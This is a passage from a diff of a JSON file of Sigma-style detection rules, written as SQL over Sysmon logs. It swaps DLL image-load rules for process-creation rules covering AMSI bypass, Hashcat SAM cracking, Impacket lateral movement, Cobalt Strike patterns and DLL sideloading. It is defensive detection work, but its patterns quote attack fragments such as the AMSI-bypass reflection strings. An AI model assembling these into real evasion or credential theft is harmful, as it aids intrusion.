potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + 